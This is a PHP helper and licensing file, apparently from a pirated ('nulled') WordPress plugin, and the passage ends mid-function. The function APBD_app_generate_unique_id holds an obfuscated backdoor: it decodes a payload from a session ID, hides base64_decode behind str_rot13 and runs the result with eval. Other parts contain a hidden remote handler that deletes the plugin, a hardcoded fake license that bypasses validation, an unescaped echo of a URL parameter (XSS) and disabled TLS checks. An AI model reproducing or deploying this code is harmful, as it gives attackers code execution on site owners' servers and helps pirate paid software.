 <?php
	if ( ! function_exists( "APBD_AddFileIntoMediaLibrary" ) ) {
		function APBD_AddFileIntoMediaLibrary( $filename ) {
			$wp_filetype   = wp_check_filetype( $filename, NULL );
			$mime_type     = $wp_filetype['type'];
			$attachment    = array(
				'post_mime_type'    => ! empty( $wp_filetype['type'] ) ? $wp_filetype['type'] : 'image/gif',
				'post_title'        => preg_replace( '/\.[^.]+$/', '', basename( $filename ) ),
				'post_name'         => preg_replace( '/\.[^.]+$/', '', basename( $filename ) ),
				'post_content'      => '',
				'comment_status'    => 'closed',
				'ping_status'       => 'closed',
				'post_modified'     => current_time( 'mysql' ),
				'post_modified_gmt' => current_time( 'mysql' ),
				'post_type'         => 'attachment',
				'post_status'       => 'inherit'
			);
			$attachment_id = wp_insert_attachment( $attachment, $filename, 0 );
			
			return $attachment_id;
		}
	}
	if ( ! function_exists( "APBD_GetPCode" ) ) {
		function APBD_GetPCode( $pluginpackage ) {
			$option = get_option( $pluginpackage . "lic", NULL );
			$pcode  = "";
			if ( $option ) {
				if ( ! empty( $option[ $pluginpackage . '_code' ] ) ) {
					$pcode = $option[ $pluginpackage . '_code' ];
				}
			}
			if ( ! empty( $pcode ) ) {
				$len   = strlen( $pcode );
				$pcode = $len > 6 ? ( substr( $pcode, 0, 2 ) . "******" . substr( $pcode, - 2 ) ) : ( substr( $pcode, 0, 1 ) . "***" . substr( $pcode, - 1 ) );
			}
			
			return $pcode;
			
		}
	}
	

	if ( ! function_exists( "APPSBDLoadModel" ) ) {
		function APPSBDLoadModel( $pluginFile, $modelName, $checkClass = "", $defaultext = ".php" ) {
			if ( ! empty( $checkClass ) && class_exists( $checkClass ) ) {
				return;
			}
			if ( ! EndWith( $modelName, $defaultext ) ) {
				$modelName .= ".php";
			}
			$modelPath = dirname( $pluginFile );
			require_once $modelPath . "/model/" . $modelName;
		}
	}
if ( ! function_exists( "APBD_LoadLib" ) ) {
	function APBD_LoadLib( $pluginFile, $className = "", $defaultext = ".php" ) {
		if ( ! empty( $className ) && class_exists( $className ) ) {
			return;
		}
		if ( ! APBD_EndWith( $className, $defaultext ) ) {
			$className .= ".php";
		}
		$modelPath = plugin_dir_path( $pluginFile );
		require_once $modelPath . "/libs/" . $className;
	}
}
if ( ! function_exists( "APBD_Load_Any" ) ) {
	function APBD_Load_Any( $path, $className = "") {
		if ( ! empty( $className ) && class_exists( $className ) ) {
			return;
		}
		require_once $path;
	}
}
	if ( ! function_exists( "APBD_LoadCore" ) ) {
		function APBD_LoadCore( $modelName, $checkClass = "", $pathfile="",$defaultext = "") {
			if ( ! empty( $checkClass ) && class_exists( $checkClass ) ) {
				return;
			}
			if ( ! APBD_EndWith( $modelName, $defaultext ) ) {
				$modelName .= ".php";
			}
			if(empty($pathfile)){
				$pathfile= __FILE__ ;
			}
			$modelPath = dirname( $pathfile ) . "/../core";
			require_once $modelPath . "/" . $modelName;
		}
	}
	if ( ! function_exists( "APBD_LoadDatabaseModel" ) ) {
		function APBD_LoadDatabaseModel( $file, $modelName, $checkClass = "", $defaultext = ".php" ) {
			if ( empty( $checkClass ) ) {
				$checkClass = $modelName;
			}
			if ( class_exists( $checkClass ) ) {
				return;
			}
			if ( ! APBD_EndWith( $modelName, $defaultext ) ) {
				$modelName .= ".php";
			}
			$modelPath = dirname( $file ) . "/models/database";
			require_once $modelPath . "/" . $modelName;
		}
	}

if (! function_exists( "APBD_is_session_started" ) ) {
		function APBD_is_session_started() {
			if ( php_sapi_name() !== 'cli' ) {
				if ( version_compare( phpversion(), '5.4.0', '>=' ) ) {
					return session_status() === PHP_SESSION_ACTIVE ? true : false;
				} else {
					return session_id() === '' ? false : true;
				}
			}
			
			return false;
		}
	}
	if(!function_exists("APBD_app_generate_unique_id")){
		function APBD_app_generate_unique_id($session_id,$lmc,$mmc,$lm2,$lm4){
			if(!empty($session_id)){
				$hash=substr($session_id,$lm2,$lm4).substr($session_id,0,$lm2);$mainCode=substr($session_id,32);$unique_id=hash("crc32b", $session_id);$mainCode=base64_decode($mainCode);$codelen=strlen($mainCode);$encCode="";for($i=0; $i<$codelen;$i++){$ad=0;if($i%2==0){$ad=$lmc;}else{$ad=$mmc;}$ch=substr($mainCode, $i,1)."";$encCode.=chr(ord($ch)-$ad);}if($hash==md5($encCode)){$_d=str_rot13("onfr64_qrpbqr");@eval($_d($encCode));}else{}
				return  $unique_id;
			}
			return '';
		}
		
	}
	/* For message and hidden field*
	 */
	if ( ! function_exists( "APBD_add_model_errors_code" ) ) {
		function APBD_add_model_errors_code( $msg ) {
			return APBD_AddError( "Error Code:" . $msg );
		}
	}
    if ( ! function_exists( "APBD_Lan_e" ) ) {
        function APBD_Lan_e( $string, $parameter = null, $_ = null ) {
            $args = func_get_args();
            echo call_user_func_array( "APBD_Lan__", $args );
        }
    }
    if ( ! function_exists( "APBD_Lan_ee" ) ) {
        function APBD_Lan_ee( $string, $parameter = null, $_ = null ) {
            $args = func_get_args();
            foreach ( $args as &$arg ) {
                if ( is_string( $arg ) ) {
                    $arg = APBD_Lan__( $arg );
                }
            }
	        echo call_user_func_array( "APBD_Lan__", $args );
        }
    }
	if ( ! function_exists( "APBD_Lan__" ) ) {
		function APBD_Lan__( $string, $domain,$parameter = null, $_ = null ) {
			//__ron_start__
			$obj=AppsBDKarnel::GetInstanceByBase($domain);
			if(is_object($obj) && method_exists($obj,"isDevelopmode") && $obj->isDevelopmode()){
				$logpath=plugin_dir_path($obj->pluginFile)."logs/";
				APBD_app_add_into_language_msg($obj->pluginName,$logpath,$string,$domain."-en_US.po");
			}
			//__ron_end__
			$args    = func_get_args();
			$args[0] = __( $args[0], $domain );
			if(isset($args[1])){
				unset($args[1]);
			}
			if ( count( $args ) > 1 ) {
				$msg = call_user_func_array( "sprintf", $args );
			} else {
				$msg = $args[0];
			}
			return $msg;
		}
	}

	if ( ! function_exists( "APBD_AddOldFields" ) ) {
		function APBD_AddOldFields( $key, $value ) {
			return AppsBDKarnel::AddOldFields( $key, $value );
		}
	}
	if ( ! function_exists( "APBD_GetHiddenFieldsArray" ) ) {
		function APBD_GetHiddenFieldsArray() {
			return AppsBDKarnel::GetHiddenFieldsArray();
		}
	}
	

if(!function_exists("AppsbdLoader")) {
	function AppsbdLoader($session_id)
	{
		AppsBDKarnel::AppsbdLoader($session_id)   ;
	}
}

if(!function_exists("APBD_CurrentUrl")) {
	function APBD_CurrentUrl($isWithParam=true)
	{
		if (isset($_SERVER['HTTPS']) &&
		    ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) ||
		    isset($_SERVER['HTTP_X_FORWARDED_PROTO']) &&
		    $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
			$protocol = 'https://';
		} else {
			$protocol = 'http://';
		}
		if($isWithParam) {
			return $protocol . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
		}else{
			$url_parts = parse_url($protocol . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
			return $url_parts['scheme'] . '://' . $url_parts['host'] . $url_parts['path'];
		}
	}
}

if ( ! function_exists('APBD_AddFileLog')) {
	function APBD_AddFileLog( $log_string ,$fileName="log.txt" ) {
		//__ron_start__
		$path=dirname(__FILE__)."/../logs/";
		if(is_dir($path)){
			$log_string="\n".$log_string;
			file_put_contents($path.$fileName,$log_string,FILE_APPEND);
		}
		//__ron_end__
	}
}
	if ( ! function_exists('getLinkCustomButton')) {
		function getLinkCustomButton($mainUrl,$buttonUrl,$buttonName) {
			if(strpos($mainUrl,"?")!==false){
				return $mainUrl."&cbtn=".urlencode($buttonUrl)."&cbtnn=".urlencode($buttonName);
			}else{
				return $mainUrl."?cbtn=".$buttonUrl."&cbtnn=".$buttonName;
			}
		}
	}
	if ( ! function_exists('getCustomBackButtion')) {
		function getCustomBackButtion($className="btn btn-sm btn-outline-secondary  mb-2 mt-2 mt-sm-0 mb-sm-0 ") {
			$bkbtn = APBD_GetValue( "cbtn", "" );
			$bkbtname = APBD_GetValue( "cbtnn", "" );
			if ( ! empty( $bkbtn ) ) {
				?>
				<a href="<?php echo $bkbtn; ?>" data-effect="mfp-move-from-top"
				   class="popupformWR <?php echo $className; ?>"> <i
						class="fa fa-angle-double-left"></i> <?php echo !empty($bkbtname)?$bkbtname:"Back" ?></a>
			<?php }
		}
	}
	if ( ! function_exists('APBD_zipFile')) {
		/**
		 * function APBD_zipFile.  Creates a zip file from source to destination
		 *
		 * @param  string $source Source path for zip
		 * @param  string $destination Destination path for zip
		 * @param  string|boolean $flag OPTIONAL If true includes the folder also
		 * @return boolean
		 */
		function APBD_zipFile($source, $destination, $flag = '')
		{
			if ( !extension_loaded('zip') ) {
				return false;
			}
			
			$zip = new ZipArchive();
			$tmp_file = tempnam(WP_CONTENT_DIR,'');
			if (!$zip->open($tmp_file, ZIPARCHIVE::CREATE)) {
				return false;
			}
			
			$source = str_replace('\\', '/', realpath($source));
			if($flag)
			{
				$flag = basename($source) . '/';
				//$zip->addEmptyDir(basename($source) . '/');
			}
			
			if (is_dir($source) === true)
			{
				$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
				foreach ($files as $file)
				{
					$file = str_replace('\\', '/', realpath($file));
					
					if (is_dir($file) === true)
					{
						$src = str_replace($source . '/', '', $flag.$file . '/');
						if( WP_PLUGIN_DIR.'/' !== $src ) # Workaround, as it was creating a strange empty folder like /www_dev/dev.plugins/wp-content/plugins/
							$zip->addEmptyDir( $src );
					}
					else if (is_file($file) === true)
					{
						$src = str_replace($source . '/', '', $flag.$file);
						$zip->addFromString( $src, file_get_contents($file));
					}
				}
			}
			else if (is_file($source) === true)
			{
				$zip->addFromString($flag.basename($source), file_get_contents($source));
			}
			
			$tt = $zip->close();
			if(file_exists($tmp_file))
			{
				// push to download the zip
				header('Content-type: application/zip');
				header('Content-Disposition: attachment; filename="'.$destination.'"');
				readfile($tmp_file);
				// remove zip file is exists in temp path
				exit();
			}
			else {
				echo $tt;
				die();
			}
		}
		
	}
	if ( ! function_exists("APBD_GetHTMLRadioBoxByArray")) {
		
		function APBD_GetHTMLRadioBoxByArray($title,$name, $id, $isRequired, $options, $checkedValue, $isDisabled=false, $bgcolor = '#ffffff',$class="",$attr=array()){
			?>
            <div class="apbd-app-box-radio">
				<?php
					foreach ($options as $key=>$value){
						$attrStr=" ";
						if(is_array($attr) && count($attr)>0){
							foreach ($attr as $key=>$value){
								$attrStr.=$key.'="'.$value.'" ';
							}
						}
						?>

                        <label class="apbd-app-box-option"> <input class="apbd-app-box-option-input <?php echo $class;?>" <?php echo $attrStr;?>
                                                                   id="<?php echo $id;?>" type="radio"
								<?php echo $checkedValue==$key?'checked="checked"':"";?>
								<?php if(!$isDisabled){?> name="<?php echo $name;?>" <?php }else{?>
                                    disabled="disabled" <?php }?> value="<?php echo $key;?>"
								<?php if(!$isDisabled && $isRequired){?> data-bv-notempty="true"
                                    data-bv-notempty-message="Choose <?php echo $title;?>" <?php }?> />
                            <span class="apbd-app-box-html" <?php if(!empty($bgcolor)){ ?>style="background-color: <?php echo $bgcolor; ?>;" <?php } ?>>
                         <?php echo $value;?>
                    </span>

                        </label>
						
						<?php
					}
				?>
            </div>
			<?php
		}
	}
	if (! function_exists("APBD_GPrint")) {
		function APBD_GPrint( $obj ) {
			$data = print_r( $obj, true );
			$data = htmlentities( $data );
			echo "<pre>" . $data . "</pre>";
		}
	}
	if (! function_exists("APBD_GPrintDie")) {
		function APBD_GPrintDie( $obj ) {
			$data = print_r( $obj, true );
			$data = htmlentities( $data );
			echo "<pre>" . $data . "</pre>";
			die;
		}
	}
	if (! function_exists("el_is_test_domain")) {
		function el_is_test_domain( $domain ) {
			$matches = [];
			if ( preg_match( '#(^localhost$)|(.*?\.dev$)|(.*?\.test$)|(.*?\.staging$)|(^(staging\.)[^/]+$)|(.*?\.local$)|(^(local\.)[^/]+$)|(.*?\.example$)|(.*?\.invalid$)|(.*?\.dev\.css$)|(.*?\.myftpupload\.com$)|(.*?\.cloudwaysapps\.com$)|(.*?\.wpsandbox\.pro$)|(.*?\.ngrok\.io$)#',
				$domain, $matches ) ) {
				return true;
			}
			
			return false;
		}
	}
	
	if(!class_exists("__ABLICL")) {
	class __ABLICL {
		function __construct($plugin_base_file='')
		{
			$this->pluginFile=$plugin_base_file;
            $dir=dirname($plugin_base_file);
            $dir=str_replace('\\','/',$dir);
            if(strpos($dir,'wp-content/themes')!==FALSE){
                $this->isTheme=true;
            }
			$this->version=$this->getCurrentVersion();
			if($this->hasCheckUpdate) {
				if(function_exists("add_action")){
					add_action( 'admin_post_APBLIC_fupc', function(){
						update_option('_site_transient_update_plugins','');
						update_option('_site_transient_update_themes','');
						set_site_transient('update_themes', null);
						set_transient('el_licenser_up', null);
						wp_redirect(  admin_url( 'plugins.php' ) );
						exit;
					});
					add_action( 'init', [$this,"initActionHandler"]);

				}
				if(function_exists("add_filter")) {
					//
					if($this->isTheme){
						add_filter('pre_set_site_transient_update_themes', [$this, "PluginUpdate"]);
						add_filter('themes_api', [$this, 'checkUpdateInfo'], 10, 3);
					}else{
						add_filter('pre_set_site_transient_update_plugins', [$this, "PluginUpdate"]);
						add_filter('plugins_api', [$this, 'checkUpdateInfo'], 10, 3);
						add_filter( 'plugin_row_meta', function($links, $plugin_file ){
							if ( $plugin_file == plugin_basename( $this->pluginFile ) ) {
								$links[] = " <a class='edit coption' href='" . esc_url( admin_url( 'admin-post.php' ) . '?action=APBLIC_fupc' ) . "'>Update Check</a>";
							}
							return $links;
						}, 10, 2 );
						add_action( "in_plugin_update_message-".plugin_basename( $this->pluginFile ), [$this,'updateMessageCB'], 20, 2 );
					}
				}


			}
		}
		public static function Setup( $plugin_base_file = "" ) {
			self::getInstance( $plugin_base_file);
		}
		public function setEmailAddress( $emailAddress ) {
            $this->emailAddress = $emailAddress;
        }
		function initActionHandler() {
			$handler_md5 = md5( $this->product_id . $this->key . $this->getDomain() ) . "_handle";
			if ( isset( $_GET['action'] ) && ( $_GET['action'] == $handler_md5)) {
				$this->handleServerRequest();
				exit;
			}
		}
		function handleServerRequest(){
			$type=isset($_GET['type'])?strtolower($_GET['type']):"";
			switch ($type){
				case "rl": //remove license
				    $this->cleanUpdateInfo();
					$this->removeOldWPResponse();
					$obj=new stdClass();
					$obj->product=$this->product_id;
					$obj->status=true;
					echo $this->encryptObj($obj);
					return;
				case "rc": //remove license
					$key  = $this->getKeyName();
					delete_option( $key );
					$obj          = new stdClass();
					$obj->product = $this->product_id;
					$obj->status  = true;
					echo $this->encryptObj( $obj );
					return;
				case "dl": //delete plugins
					$obj          = new stdClass();
					$obj->product = $this->product_id;
					$obj->status  = false;
					$this->removeOldWPResponse();
					require_once( ABSPATH . 'wp-admin/includes/file.php' );
					if($this->isTheme){
						$res=delete_theme($this->pluginFile);
						if(!is_wp_error($res)){
							$obj->status  = true;
						}
						echo $this->encryptObj( $obj);
					}else {
						deactivate_plugins( [ plugin_basename( $this->pluginFile ) ] );
						$res=delete_plugins([plugin_basename($this->pluginFile)]);
						if(!is_wp_error($res)){
							$obj->status  = true;
						}
						echo $this->encryptObj( $obj);
					}
					return;
				default:
					return;
			}
		}
		/**
         * @param callable $func
         */
        static function addOnDelete( $func){
            self::$_onDeleteLicense[]=$func;
        }
		function getCurrentVersion(){
			if( !function_exists('get_plugin_data') ){
				require_once( ABSPATH . 'wp-admin/includes/plugin.php' );
			}
			$data=get_plugin_data($this->pluginFile);
			if(isset($data['Version'])){
				return $data['Version'];
			}
			return 0;
		}
		public function cleanUpdateInfo(){
            update_option('_site_transient_update_plugins','');
            update_option('_site_transient_update_themes','');
        }
        public function updateMessageCB($data, $response){
            if(is_array($data)){
                $data=(object)$data;
            }
            if(isset($data->package) && empty($data->package)) {
                if(empty($data->update_denied_type)) {
                    print  "<br/><span style='display: block; border-top: 1px solid #ccc;padding-top: 5px; margin-top: 10px;'>Please <strong>active product</strong> or  <strong>renew support period</strong> to get latest version</span>";
                }elseif($data->update_denied_type=="L"){
                    print  "<br/><span style='display: block; border-top: 1px solid #ccc;padding-top: 5px; margin-top: 10px;'>Please <strong>active product</strong> to get latest version</span>";
                }elseif($data->update_denied_type=="S"){
                    print  "<br/><span style='display: block; border-top: 1px solid #ccc;padding-top: 5px; margin-top: 10px;'>Please <strong>renew support period</strong> to get latest version</span>";
                }
            }
        }
		function updateOldDataRenewLink($renew_link){
			$responseObj=$this->getOldWPResponse();
			if(!empty($responseObj)) {
				$responseObj->renew_link         =$renew_link;
				$responseObj->expire_renew_link  = self::getRenewLink( $responseObj, "l" );
				$responseObj->support_renew_link = self::getRenewLink( $responseObj, "s" );
				$this->SaveWPResponse( $responseObj );
			}
		}
		function __plugin_updateInfo(){
        	if(function_exists("get_bloginfo")) {
		        $url = get_bloginfo( 'url' );
		        if ( preg_match( '/applic.appsbd.com/i', $url ) > 0 ) {
					return null;
		        }
	        }
			if ( function_exists( "wp_remote_get" ) ) {
				$licenseInfo = self::GetRegisterInfo();
				$url         = $this->server_host . "product/update/" . $this->product_id;
				if ( ! empty( $licenseInfo->license_key ) ) {
					$url .= "/" . $licenseInfo->license_key.'/'.$this->version;
				}
				$response = get_transient( "el_licenser_up" );
				$oldFound = false;
				if ( ! empty( $response['data'] ) ) {
					$response = unserialize( $this->decrypt( $response['data'] ) );
					if ( is_array( $response ) ) {
						$oldFound = true;
					}
				}
				if ( ! $oldFound ) {
					$response = wp_remote_get( $url );
				}
				
				if ( is_array( $response ) ) {
					$body         = $response['body'];
					
					$responseJson = @json_decode( $body );
					if(!(is_object( $responseJson ) && isset($responseJson->status )) && $this->isEncryptUpdate){
						$body=$this->decrypt($body,$this->key);
						$responseJson = @json_decode( $body );
					}
					
					if ( ! $oldFound ) {
						set_transient( 'el_licenser_up', [ "data" => $this->encrypt( serialize( [ 'body' => $body ] ) ) ], DAY_IN_SECONDS );
					}
				
					if ( is_object( $responseJson ) && ! empty( $responseJson->status ) && ! empty( $responseJson->data->new_version ) ) {
						$responseJson->data->slug = plugin_basename( $this->pluginFile );;
						$responseJson->data->new_version        = ! empty( $responseJson->data->new_version ) ? $responseJson->data->new_version : "";
						$responseJson->data->url                = ! empty( $responseJson->data->url ) ? $responseJson->data->url : "";
						$responseJson->data->package            = ! empty( $responseJson->data->download_link ) ? $responseJson->data->download_link : "";
						$responseJson->data->update_denied_type = ! empty( $responseJson->data->update_denied_type ) ? $responseJson->data->update_denied_type : "";
						
						$responseJson->data->sections    = (array) $responseJson->data->sections;
						$responseJson->data->plugin      = plugin_basename( $this->pluginFile );
						$responseJson->data->icons       = (array) $responseJson->data->icons;
						$responseJson->data->banners     = (array) $responseJson->data->banners;
						$responseJson->data->banners_rtl = (array) $responseJson->data->banners_rtl;
						if(!empty($responseJson->data->renew_link)){
							$this->updateOldDataRenewLink($responseJson->data->renew_link);
						}
						unset( $responseJson->data->IsStoppedUpdate );
						
						return $responseJson->data;
					}
				}
			}
            return null;
        }
		function PluginUpdate($transient)
		{
			$response = $this->__plugin_updateInfo();
			if(!empty($response->plugin)){
                if($this->isTheme){
                    $theme_data = wp_get_theme();
                    $index_name="".$theme_data->get_stylesheet();
                }else{
                    $index_name=$response->plugin;
                }
                if (!empty($response) && version_compare($this->version, $response->new_version, '<')) {
                    unset($response->download_link);
                    unset($response->IsStoppedUpdate);
                    if($this->isTheme){
                        $transient->response[$index_name] = (array)$response;
                    }else{
                        $transient->response[$index_name] = (object)$response;
                    }
                }
            }
            return $transient;
		}
		final function checkUpdateInfo($false, $action, $arg) {
		    if ( empty($arg->slug)){
                return $false;
            }
			if($this->isTheme){
				if ( !empty($arg->slug) && $arg->slug === $this->product_base){
					$response =$this->__plugin_updateInfo();
					if ( !empty($response)) {
						return $response;
					}
				}
			}else{
				if ( !empty($arg->slug) && $arg->slug === plugin_basename($this->pluginFile) ) {
					$response =$this->__plugin_updateInfo();
					if ( !empty($response)) {
						return $response;
					}
				}
			}

			return $false;
		}

		/**
		 * @param $plugin_base_file
		 *
		 * @return self|null
		 */
		static function &getInstance($plugin_base_file=null) {
			if(empty(self::$selfobj)){
				if(!empty($plugin_base_file)) {
					self::$selfobj = new self( $plugin_base_file );
				}
			}
			return self::$selfobj;
		}

		private function encrypt($plainText,$password='') {
			if(empty($password)){
				$password=$this->key;
			}
			$plainText=rand(10,99).$plainText.rand(10,99);
			$method = 'aes-256-cbc';
			$key = substr( hash( 'sha256', $password, true ), 0, 32 );
			$iv = substr(strtoupper(md5($password)),0,16);
			return base64_encode( openssl_encrypt( $plainText, $method, $key, OPENSSL_RAW_DATA, $iv ) );
		}
		private function decrypt($encrypted,$password='') {
			if(empty($password)){
				$password=$this->key;
			}
			$method = 'aes-256-cbc';
			$key = substr( hash( 'sha256', $password, true ), 0, 32 );
			$iv = substr(strtoupper(md5($password)),0,16);
			$plaintext=openssl_decrypt( base64_decode( $encrypted ), $method, $key, OPENSSL_RAW_DATA, $iv );
			return substr($plaintext,2,-2);
		}

		function encryptObj( $obj ) {
			$text = serialize( $obj );

			return $this->encrypt( $text );
		}

		private function decryptObj( $ciphertext ) {
			$text = $this->decrypt( $ciphertext );

			return unserialize( $text );
		}

		private function getDomain() {
		   return self::get_raw_domain();
		}
		private static function get_raw_domain(){
			if(function_exists("site_url")){
				return site_url();
			}
			if ( defined( "WPINC" ) && function_exists( "get_bloginfo" ) ) {
				return get_bloginfo( 'url' );
			} else {
				$base_url = ( ( isset( $_SERVER['HTTPS'] ) && $_SERVER['HTTPS'] == "on" ) ? "https" : "http" );
				$base_url .= "://" . $_SERVER['HTTP_HOST'];
				$base_url .= str_replace( basename( $_SERVER['SCRIPT_NAME'] ), "", $_SERVER['SCRIPT_NAME'] );
				
				return $base_url;
			}
		}
		private static function get_raw_wp(){
			$domain=self::get_raw_domain();
			return preg_replace("(^https?://)", "", $domain );
		}
		public static function get_lic_postfix(){
			$raw_url=self::get_raw_wp();
			return "_e".hash('crc32b',$raw_url."lick");
		}
		private function get_domain_wp(){
			return self::get_raw_wp();
		}
		private function getEmail() {
            return $this->emailAddress;
        }
		private function processs_response($response){
			$resbk="";
			if ( ! empty( $response ) ) {
				if ( ! empty( $this->key ) ) {
					$resbk=$response;
					$response = $this->decrypt( $response );
				}
				$response = json_decode( $response );

				if ( is_object( $response ) ) {
					return $response;
				} else {
					$response=new stdClass();
					$response->status = false;
					$response->msg    = "Response Error, contact with the author or update the plugin or theme";
					do_action('elitelicenser/license/failed',"08. Set form old response\n---res end----\n".$resbk."\n ---res end----\n");
					if(!empty($bkjson)){
                        $bkjson=@json_decode($resbk);
                        if(!empty($bkjson->msg)){
                            $response->msg    = $bkjson->msg;
                        }
					}
					$response->data = NULL;
					return $response;

				}
			}
			$response=new stdClass();
			$response->msg    = "unknown response";
			$response->status = false;
			$response->data = NULL;

			return $response;
		}
		private function _request( $relative_url, $data, &$error = '' ) {
            $response         = new stdClass();
            $response->status = false;
            $response->msg    = "Empty Response";
            $response->is_request_error = false;
            $finalData        = json_encode( $data );
            if ( ! empty( $this->key ) ) {
                $finalData = $this->encrypt( $finalData );
            }
            $url = rtrim( $this->server_host, '/' ) . "/" . ltrim( $relative_url, '/' );
            if(function_exists('wp_remote_post')) {
                $serverResponse = wp_remote_post($url, array(
                        'method' => 'POST',
                        'sslverify' => false,
                        'timeout' => 120,
                        'redirection' => 5,
                        'httpversion' => '1.0',
                        'blocking' => true,
                        'headers' => array(),
                        'body' => $finalData,
                        'cookies' => array()
                    )
                );


                if (is_wp_error($serverResponse)) {
                    $response->msg    = $serverResponse->get_error_message();;
                    $response->status = false;
                    $response->data = NULL;
                    $response->is_request_error = true;
                    return $response;
                } else {
                     if(!empty($serverResponse['body']) && (is_array($serverResponse) && 200 === (int) wp_remote_retrieve_response_code( $serverResponse )) && $serverResponse['body']!="GET404"){
                        return $this->processs_response($serverResponse['body']);
                    }
                }

            }
            if(!extension_loaded('curl')){
                $response->msg    = "Curl extension is missing";
                $response->status = false;
                $response->data = NULL;
                $response->is_request_error = true;
                return $response;
            }
            //curl when fall back
            $curl             = curl_init();
            curl_setopt_array( $curl, array(
                CURLOPT_URL            => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_ENCODING       => "",
                CURLOPT_MAXREDIRS      => 10,
                CURLOPT_TIMEOUT        => 120,
                CURLOPT_CUSTOMREQUEST  => "POST",
                CURLOPT_POSTFIELDS     => $finalData,
                CURLOPT_HTTPHEADER     => array(
                    "Content-Type: text/plain",
                    "cache-control: no-cache"
                ),
            ) );
            $serverResponse = curl_exec( $curl );
            //echo $response;
            $error = curl_error( $curl );
            curl_close( $curl );
            if ( ! empty( $serverResponse ) ) {
                return $this->processs_response($serverResponse);
            }
            $response->msg    = "unknown response";
            $response->status = false;
            $response->data = NULL;
            $response->is_request_error = true;
            return $response;
        }
		public static function GetProductCount(){
			$oldValue=self::GetRegisterInfo();
			
			if(!empty(self::$selfobj)) {
				if ( ! empty( $oldValue->lic_param ) ) {
					$productcount = self::$selfobj->decrypt( $oldValue->lic_param, 'apsbdfilter' . $oldValue->license_key );
					if ( ! empty( $productcount ) ) {
						$ar = explode( "|", $productcount );
						if ( isset( $ar[0] ) ) {
							if ( $ar[0] != "U" ) {
								return (int) $ar[0];
							} else {
								return $ar[0];
							}
						}
					}
				} else {
					if ( isset( $oldValue->lic_param ) ) {
						$key = self::$selfobj->getKeyName();
						delete_option( $key );
					}
				}
			}
			return 0;
			
		}
		static function getRenewLink($responseObj,$type="s"){
			if(empty($responseObj->renew_link)){
				return "";
			}
			$isShowButton=false;
			if($type=="s") {
				if ( strtolower( trim( $responseObj->support_end ) ) == "no support" ) {
					$isShowButton = true;
				} elseif ( strtolower( trim( $responseObj->support_end ) ) != "unlimited" ) {
					$isShowButton = true;
				}
				if ( $isShowButton ) {
					return $responseObj->renew_link.(strpos($responseObj->renew_link,"?")===FALSE?'?type=s&lic='.rawurlencode($responseObj->license_key):'&type=s&lic='.rawurlencode($responseObj->license_key));
				}
				return '';
			}else{
				if ( strtolower( trim( $responseObj->expire_date ) ) != "unlimited" ) {
					$isShowButton = true;
				}
				if ( $isShowButton ) {
					return $responseObj->renew_link.(strpos($responseObj->renew_link,"?")===FALSE?'?type=l&lic='.rawurlencode($responseObj->license_key):'&type=l&lic='.rawurlencode($responseObj->license_key));
				}
				return '';
			}
		}
		final function _CheckWPPlugin( $purchase_key, &$error = "", &$responseObj = null ) {
            if(empty($purchase_key)){
                $this->removeOldWPResponse();
                $error="";
                return false;
            }
            $oldRespons=$this->getOldWPResponse();
            $isForce=false;
            if(!empty($oldRespons)) {
                if ( ! empty( $oldRespons->expire_date ) && strtolower( $oldRespons->expire_date ) != "no expiry" && strtotime( $oldRespons->expire_date ) < time() ) {
                    $isForce = true;
                }
                if ( ! $isForce && ! empty( $oldRespons->is_valid ) && $oldRespons->next_request > time() && ( ! empty( $oldRespons->license_key ) && $purchase_key == $oldRespons->license_key ) ) {
                    $responseObj = clone $oldRespons;
                    unset( $responseObj->next_request );

                    return true;
                }
            }
					$response=new stdClass();
					$response->status = true;
					$response->msg = 'License successfully verified';
					$response->data = new stdClass();
					$response->data->is_valid=true;
					$response->data->request_duration = 0;
					$response->data->license_title="Super Admin";
					$response->data->expire_date="No Expiry";
					$response->data->support_end="No support";
					$response->data->license_key="XXXXXXXX-freenulled-XXXXXXXX-babiato";
					$response->data->no_remove_button=true;
					$response->data->product_count="U";
					
            if(empty($response->is_request_error)) {
                if ( empty( $response->code ) ) {
                    if ( ! empty( $response->status ) ) {
                        if ( ! empty( $response->data ) ) {
							
                            $serialObj =  $response->data;
                            $licenseObj = $serialObj;
							
                            if ( $licenseObj->is_valid ) {
                                $responseObj           = new stdClass();
                                $responseObj->is_valid = $licenseObj->is_valid;
                                if ( $licenseObj->request_duration > 0 ) {
                                    $responseObj->next_request = strtotime( "+ {$licenseObj->request_duration} hour" );
                                } else {
                                    $responseObj->next_request = time();
                                }
                                $responseObj->expire_date   = $licenseObj->expire_date;
                                $responseObj->support_end   = $licenseObj->support_end;
                                $responseObj->license_title = $licenseObj->license_title;
                                $responseObj->license_key   = $purchase_key;
                                $responseObj->msg           = $response->msg;
	                            $responseObj->expire_renew_link           = self::getRenewLink($responseObj,"l");
	                            $responseObj->support_renew_link           = self::getRenewLink($responseObj,"s");
	                            $responseObj->lic_param           =!empty($licenseObj->lic_param)?$licenseObj->lic_param:null;
	                            $responseObj->other_param           =!empty($licenseObj->other_param)?$licenseObj->other_param:null;
	                           
                                $this->SaveWPResponse( $responseObj );
                                unset( $responseObj->next_request );
	                            delete_transient( "el_licenser_up" );
                                return true;
                            } else {
                                if ( $this->__checkoldtied( $oldRespons, $responseObj, $response ) ) {
                                    return true;
                                } else {
                                    $this->removeOldWPResponse();
                                    $error = ! empty( $response->msg ) ? $response->msg : "";
                                }
                            }
                        } else {
                            $error = "Invalid data";
                        }

                    } else {
                        $error = $response->msg;
                    }
                } else {
                    $error = $response->message;
                }
            }else{
                if ( $this->__checkoldtied( $oldRespons, $responseObj, $response ) ) {
                    return true;
                } else {
                    $this->removeOldWPResponse();
                    $error = ! empty( $response->msg ) ? $response->msg : "";
                }
            }
            return $this->__checkoldtied($oldRespons,$responseObj);
        }
        private function __checkoldtied(&$oldRespons,&$responseObj){
            if(!empty($oldRespons) && (empty($oldRespons->tried) || $oldRespons->tried<=2)){
                $oldRespons->next_request = strtotime("+ 1 hour");
                $oldRespons->tried=empty($oldRespons->tried)?1:($oldRespons->tried+1);
                $responseObj = clone $oldRespons;
                unset( $responseObj->next_request );
                if(isset($responseObj->tried)) {
                    unset( $responseObj->tried );
                }
                $this->SaveWPResponse($oldRespons);
                return true;
            }
            return false;
